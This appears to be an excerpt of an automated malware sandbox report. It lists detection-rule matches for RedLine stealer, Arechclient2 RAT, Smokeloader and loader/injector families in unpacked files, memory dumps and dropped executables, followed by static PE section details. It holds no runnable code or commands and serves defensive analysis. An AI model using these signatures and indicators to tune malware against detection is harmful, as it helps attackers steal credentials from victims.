                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, type: DROPPEDMatched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: libcurl.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libstdc++-6.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurl.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libstdc++-6.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Mon1785436ae78.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: libcurl.dll.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: libcurlpp.dll.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: libstdc++-6.dll.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: Section: [$vdPf# ZLIB complexity 1.0008012820512822
                  Source: libcurl.dll.1.drStatic PE information: Section: .rdata ZLIB complexity 0.9936941964285714
                  Source: libcurl.dll.1.drStatic PE information: Section: .reloc ZLIB complexity 0.9967105263157895
                  Source: libcurlpp.dll.1.drStatic PE information: Section: /4 ZLIB complexity 1.002685546875
